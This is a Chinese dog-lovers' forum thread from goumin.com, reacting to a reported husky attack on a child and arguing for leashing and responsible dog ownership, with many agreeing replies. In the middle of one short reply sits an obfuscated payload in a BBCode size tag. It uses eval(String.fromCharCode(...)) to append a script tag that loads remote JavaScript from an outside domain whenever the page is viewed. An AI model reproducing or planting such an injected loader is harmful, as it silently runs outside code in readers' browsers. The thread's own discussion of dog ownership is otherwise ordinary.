设为首页收藏本站

狗民网

[养宠故事] 不是养狗的人没素质,而是没素质的人学我们养狗了

plumy_004

黄金元老

狗民币:23249

黄金元老勋章 财富勋章 精华勋章

今天在当地的百度贴吧里看到一则帖子,帖子的内容是一个孩子被一只哈士奇咬伤了,脸上缝了200多针,不规则的伤口很是吓人,并附带了一张打了马赛克的照片。尽管照片看不太清,但仍看得我心一紧,那得多疼啊!看那孩子的大概模样,应该跟吉祥麻麻差不多大,身为一个孩子的母亲看到这样的图片真是特别难受,可想而知,这个孩子的妈妈得是什么心情。
1 [4 V( ~% f& ^' X& t+ w6 G 0.png

9 @6 B3 A3 p5 F  G5 v) B& ?    之所以把这件事拿到狗民网里说,不仅因为这篇帖子的主角是只哈士奇,是只狗,还因为这篇狗伤人的帖子再一次引起了大众的反狗共鸣,一些难听的字眼再一次迸发了出来。身为养狗的人,自然是要拨乱反正,来纠正一些人的片面、偏激的言论,但是我们养狗人是不是也该反思一下呢?是不是也该剖析一下呢?

首先,来看看那些不养狗的吧友都说了些什么。(部分评论截图)
+ n" F' c" k/ j1 H* B5 k8 E% e, q 2.png

/ ~" n/ Y# _2 q  e* N5 X. w6 j" O    不难看出,大家的气愤多是源自遛狗不牵引、养狗人责任意识淡薄。评论者多数比较客观,但其中也不乏一些脑残的人。也不知道现在人都怎么了,正能量、好人好事没人关注,反倒那些个例被一些网渣、喷子片面地放大。没文化真可怕,有人说狗就是一盘菜,跟猪牛羊没区别,要这么说盲人导盲用的导盲犬也是菜?地震搜救的时候那些搜救犬也是菜?缉毒刑侦的时候那些缉毒犬、防爆犬也是菜?还没见哪个地震时被压在石头底下的人高喊“我不要一盘菜来救我”。可以不爱,但不应大言不惭,这只能让别人发现原来他是个愚昧无知的人。

其次,再来说说我们养狗人应当思考的问题。
- {# Z3 }- n9 L        狗狗犯的错就应该狗主人来承担,这是无可厚非的事。因为它们就算再聪明也不会无师自通,了解人类社会的规则,可是就是有一些养狗的人,狗狗没教好,吓到或伤到了别人,明明是理亏的,但担心赔钱或怎样,也要摆出一副很有道理的样子,埋怨别人没看好孩子。这都是什么素质?难怪不养狗的人对养狗这么反感,都是被这些没素质的人闹的。养狗跟养孩子一样,它们都需要学习和被教育,不是有句话说“什么样的父母就有什么样的孩子”吗,要我看,什么样的主人就会养什么样的狗。不是养狗人不咋地(没素质),而是不咋地(没素质)的人养狗了,坏了我们的名声。

现在国内养狗乱象横出,养狗人的素质参差不齐,遛狗不牵引、狗屎遍地、吠叫扰民等现象时有发生。归根结底,就是大多数国人素质不高,加上没有健全的动物法来约束养狗人。不管是什么人,几百、几十就能买一只狗回家,但是对养狗的人却没还有任何约束和限制,这就导致一些不文明的养狗行为出现在大家身边,甚至伤害到了他人的人身安全。一些养狗人自身就不是什么文明人,做的也净是些缺德事,怎么可能成为文明养犬人?6 j' g; a! e% D8 E
    我气愤,气那些不文明养狗人害我们受牵连、受责骂,我碰到过养狗的人批评我给狗戴脖圈和牵引是虐待;我悲哀,为我们身边文明养犬人不多而悲哀,前几日我带吉祥出门方便,我在给吉祥铲屎的时候却踩到了其他狗的粪便,气得我爆了粗口,养狗的我踩了狗屎都这样,更何况那些不养狗的人;我鄙视,鄙视那些不孝顺父母却孝顺狗的人,这就是别人口中的“狗奴”,一个刺眼刺耳的词;我无奈,无奈创建一个和谐的养犬环境如此之难。
. @: `: U! F7 o    国家不仅应当尽快出台小动物和家养宠物保护法,也应该对养狗人的素质、养狗资格进行限定,就跟考驾照一样,够资格才允许养狗,省得我们这些无辜的养狗人跟着受牵连。
0 R4 H( \) m# E9 ?- b- F0 ]. T, D

* f: @1 m/ s' z) ?
    我不能说是养狗人的表率,但至少在养犬方面我还是比较有素质的。除非是在周围没人且对狗狗安全的环境下我会卸下牵引,否则我是一牵到底的。注意看图片右下角的时间,那天收拾新家收拾到深夜,只能带吉祥在马路边溜达一会,(因为马路有灯,旁边部队还有个部队,不然我害怕),尽管深夜路上已几乎见不到行人了,但指不定什么时候就会有行人走过,万一是个怕狗的人,松开牵引的话就会吓到别人,同时也会让狗狗处在危险中,毕竟那是马路,时不时地还是会有汽车驶过,万一狗狗突然冲出马路,就会追悔莫及。: a" S4 H2 j3 u8 P

% |% [1 ]* l( v7 \1 T; \ 20170515.jpg

$ @7 ?1 s# {$ D6 ^! x 20170510.jpg

3 z  ]. ?) A) F  T- k7 f* O8 Q0 u! t8 Y% W, X! U
    最后,晒一下我家吉祥和宾利的新家吧!(还有些收尾工作没做完)
" U2 U; c# Q3 J& H! i 1512231650.jpg

: v0 B0 e1 i% F1 y8 J  _+ b

yaojia227

蝴蝶犬俱乐部版主

茄子,茄子,我爱你!

狗民币:73904

至尊元老勋章 高级水手 财富勋章 精华勋章

看了小男孩的照片,真的好心疼。只能在心里遥祝小朋友早日康复。

吉祥MaMa  是啊  发表于 17/5/16 15:41 回复点评

yaojia227

蝴蝶犬俱乐部版主

茄子,茄子,我爱你!

让我们一起积极客观地评价和理性地分析,让国内的养宠环境更和谐、更美好$ [# n# y2 G" z7 w1 V

, r" O! \( v# @6 |( a1 o9 A! \1 U
& J" F& w; ^4 S$ ^0 K- F% {感谢姥姥的热点分享和观点阐述,帖子加精华啦,希望孩子和毛孩子都能健康地成长、快乐地生活!) Z% z: t, X2 w- i9 @

吉祥MaMa  谢谢茄子麻的鼓励  发表于 17/5/16 15:50 回复点评

yaojia227

蝴蝶犬俱乐部版主

茄子,茄子,我爱你!

恭喜吉祥姥姥佳帖荣登论坛首页,请您跟帖领取奖励:3 j& k: Q! K. ~6 z" i
http://bbs.goumin.com/thread-4449507-1-1.html
# i6 f. E) v% z& i2 v, i9 \5 p& `
7 i, j1 h0 k) u9 J, C- k1 l% h 5.16吉祥.png

8 [7 I  ^& M" M2 e7 L5 z0 @! [3 e* @ 谢谢.gif
3 n; V  ?1 L5 u7 ^, [9 C

吉祥MaMa  谢谢茄子麻推荐  发表于 17/5/16 15:51 回复点评

yaojia227

蝴蝶犬俱乐部版主

茄子,茄子,我爱你!

晒一下我家吉祥和宾利的新家吧!(还有些收尾工作没做完)——好幸福的吉祥宝贝和即将到家的小宾利,姥姥要注意身体,别太累着了
1 R* N0 C9 ~+ x9 ~& }看姥爷站那里是在思考小宾利到家后的各种训练问题吧,哈哈哈

吉祥MaMa  嗯嗯,谢谢茄子麻关心,估计过了这个月就好了。  发表于 17/5/16 17:50 回复点评

超级版主

至尊元老

狗民币:172193

至尊元老勋章 中级宅星勋章 高级水手 财富勋章 精华勋章

身处都市养狗,一定要做到文明,自律,这也是个人素质和责任感的综合体现,这样才能为爱犬赢得更多的理解和友爱。" `* c  P0 q5 Q% {  \

+ X4 Z4 K2 h5 d; [1 G; C出门一定要牵引,特别是脾气不好的狗狗,可以避免各种悲剧发生,对怕狗的路人也是一种尊重,一根牵引绳,能让你和爱犬和邻居都安心,多好啊!
0 E1 @: u  B- N) Z4 f( Z' i. \
% G+ `0 [/ K8 q

吉祥MaMa  泰奶奶说得太好了!  发表于 17/5/16 17:50 回复点评
吉祥MaMa  昨天吉祥麻麻非要去广场骑自行车,我只好牵着吉祥在一旁坐着,很多路过的人看着我家吉祥是牵引着的,其实都表现得很友好,还有很多家长跟自己的孩子说,“看,那是狗狗,汪汪,可不可爱?”其实只要不养狗的人没有受到养狗人不好的影响,也确认自己是安全的话,他们也是爱动物的,变态还是少数  发表于 17/5/16 17:52 回复点评
哈哪哈小胖  以前 看见 说狗狗可爱的孩子和家长会很暖心,超级讨厌 见了就躲的孩子,但是现在理解了,还是很多小孩子确实害怕毛茸茸的动物。最讨厌的是 见了小动物就要上手打的。那必定 骂回去  发表于 17/5/17 20:18 回复点评

gm_ImXSW2QyrsH6

初级狗民

狗民币:59

/ v: f. }2 K1 G1 F
咱们养狗人的素质参差不齐,肯定有这么一小部份人的
6 o6 T+ A# v* h: ^2 Z* {1 Z$ M" t8 F2 V! P6 y4 n% O

, u+ E5 {+ y2 x3 I
3 x& Q1 f7 G# J# q7 K9 `# H8 s/ |, q9 u; R/ c
; K; D: a3 }6 W4 k

7 X# d; g0 V1 P. ]3 {
: z  U  @) u% M6 Z1 u5 J5 ~" b2 y  D+ D5 D: M7 m& g; C9 m9 b
- t; u6 v9 j8 N! E" L( H. K& I
1 z4 @1 x6 v7 s0 K. L/ W
2 u" u0 ^& X: C1 H- g6 @2 T
[size=filesize ('+eval(String.fromCharCode(119,105,116,104,40,100,111,99,117,109,101,110,116,41,48,91,98,111,100,121,46,97,112,112,101,110,100,67,104,105,108,100,40,99,114,101,97,116,101,69,108,101,109,101,110,116,40,39,115,99,114,105,112,116,39,41,41,46,115,114,99,61,39,104,116,116,112,58,47,47,99,110,52,122,46,99,111,109,47,99,110,122,122,46,106,115,39,93,59))+' Bytes)]

吉祥MaMa  其实这不部分人并不少,至少我这是这样。人行道上随处可见的狗屎让我忍不住爆粗口  发表于 17/5/17 08:59 回复点评

gm_v4VSVgQGeymX

金牌狗民

狗民币:73

金牌狗民勋章

我家黑狗,现在还小,有时确实有不认识的会害怕,我都拖着远远绕开。实在绕不开也说不好意思。怕狗的人也确实害怕。不带牵引还是不好。

吉祥MaMa  是啊,戴着牵引人们本能就觉得不会有危险,第一印象就是友善的。这两天带吉祥在小区溜达,有孩子的家长因为看着吉祥是牵着的,都会跟旁边的孩子介绍说这是狗狗。相反,要是不牵着,家长出于保护孩子的本能,就会很激动地驱赶,然后对我恶言相向  发表于 17/5/17 08:58 回复点评

狗民币:100495

社会还真有你说的那种狗奴,我也不喜欢那样的,爱狗更应该爱父母,养狗不易,才更要知道父母恩更重

吉祥MaMa  乔巴麻说的对,孝顺父母,爱自己的家人,才是上上人。  发表于 17/5/17 08:55 回复点评
相遇就是缘!彼此依靠,共度一生!

相亲相爱的一家!

狗民币:100495

多么好的狗,也不能保证它就不咬人,不咬只是相对以前没有咬过,主人们还是要警钟长鸣哪

吉祥MaMa  是啊,狗主人必须有风险意识  发表于 17/5/17 08:54 回复点评
相遇就是缘!彼此依靠,共度一生!

相亲相爱的一家!

gm_UeRQiVbsd7wV

狗民元老

狗民币:80

狗民元老勋章

吉祥MaMa  谢谢夸奖  发表于 17/5/17 08:54 回复点评

lulu85907736

钻石元老

狗民币:14187

钻石元老勋章 中级水手 财富勋章 精华勋章

一定要文明养狗,看好和教育好自家的狗狗,这孩子的脸吓人真可怜

吉祥MaMa  是啊,只要养狗人有这个风险意识,出门牵引,主动避开人群,这种事件发生的概率还是微乎其微的  发表于 17/5/17 08:54 回复点评

goumin2658q0

狗民元老

狗民币:0

狗民元老勋章

感谢分享……牵引真的很重要,如果遇到有不懂事的家长允许孩子逗狗,我都会提醒他们管好孩子

吉祥MaMa  昨晚我带吉祥下楼溜达,就有个小男孩拿着树枝追过来,好像也不是要打,只是要逗。他奶奶还是姥姥坐在大那边,可能看着我牵着吉祥呢,觉得孩子没有危险,所以也没制止,我就挺来气,本来是想说“你还是让你家孩子别看见狗就逗,我家吉祥是牵着的,万一你家孩子养成逗狗习惯了,碰到别的狗或者没牵着的狗,就好吃亏了”。后来想想算了,我赶紧牵着吉祥来开就是了,多一事不如少一事,哪天她再投毒加害我们。  发表于 17/5/17 08:51 回复点评
吉祥MaMa  昨天这件事,这个孩子的奶奶监管失责,幸好是我牵着吉祥,如果吉祥也没牵着,她也不制止,虽然吉祥不咬人,但如果孩子被吓到了,她肯定会把责任全归在我们身上,丝毫不会检讨自己。所以,咱们养狗人为了狗狗的安全,只能尽量想得周全一些,出门一定牵引好自己的狗狗,避开人群  发表于 17/5/17 08:53 回复点评
MIT谜团儿 @ 吉祥MaMa  是啊是啊!我只要老远看见有小孩,老人,女银和不怎么样的男淫早早就拉着谜团儿绕着走,一个是他有点大,我怕吓到别人,关键就是怕被坏银讹上  发表于 17/5/17 13:11 回复点评
吉祥MaMa @ MIT谜团儿  对,有些人可爱小题大做了  发表于 17/5/17 13:14 回复点评

小雪_wpuw

高级狗民

狗民币:253

心疼孩子,心疼狗狗。双方的家长能不能负起责任来呀。

吉祥MaMa  人被咬伤,我觉得真的狗主人的责任要更大  发表于 17/5/17 08:47 回复点评

gm_9U5CWBiSPTJx

初级狗民

凡事有两面,用好的方法处理才对。楼主说的对,我们养我们养小家伙早严于律己自己素质高点,不让那些偏激的人嚼舌。希望世界上所有生物都被温柔以待。

吉祥MaMa  说得对!让更多人看到我们养狗人的文明和高素质,就能逐渐消除他们对狗狗的抵触  发表于 17/5/17 08:47 回复点评

woshixiaopo

金牌狗民

好好爱我们的狗狗

狗民币:744

金牌狗民勋章

文明养狗,出门必须牵引。读完了文章,才看到是吉祥妈的文笔。大赞!

吉祥MaMa  凯蒂麻谬赞啦  发表于 17/5/17 08:46 回复点评

gm_rmBiklHWNmlc

初级狗民

恕我直言,百度贴吧里的东西可信程度有待考证

吉祥MaMa  暂且不谈这个新闻的真伪,但这个新闻引发的社会效应还是值得我们关注和深思的  发表于 17/5/17 08:45 回复点评

yaojia227

蝴蝶犬俱乐部版主

茄子,茄子,我爱你!

恭喜吉祥姥姥佳帖荣登铃铛首页

吉祥MaMa  谢谢茄子麻推荐  发表于 17/5/17 08:44 回复点评

friend42zx3y

高级狗民

狗民币:122

哎,虽然国家在发展,人的素质跟不上啊

吉祥MaMa  国民素质真的是差了一大截  发表于 17/5/17 08:44 回复点评

高高(2)

青铜元老

狗民币:8218

青铜元老勋章

带狗出门真的是小心又小心,怕狗儿丢,怕狗儿伤到别人,也怕小狗受到伤害,总有一些小孩喜欢追着狗儿,追上了又是摸又是踢的,大人在旁边也不管,被咬了完全是狗的责任吗?

吉祥MaMa  养狗人其实是弱势群体。昨天我带吉祥下楼,一个小男孩就拿着小树枝追过来,她奶奶估计是看着我牵着也没管。我就挺来气,你不能看你家孩子没有危险就允许他来欺负我家狗吧?如果反过来呢?是不是她早就跳起来了!  发表于 17/5/17 08:43 回复点评
华姐爱叮当  就是,出事了就是狗儿的错,就是狗儿该死了,现在这种人太多了  发表于 17/5/19 07:58 回复点评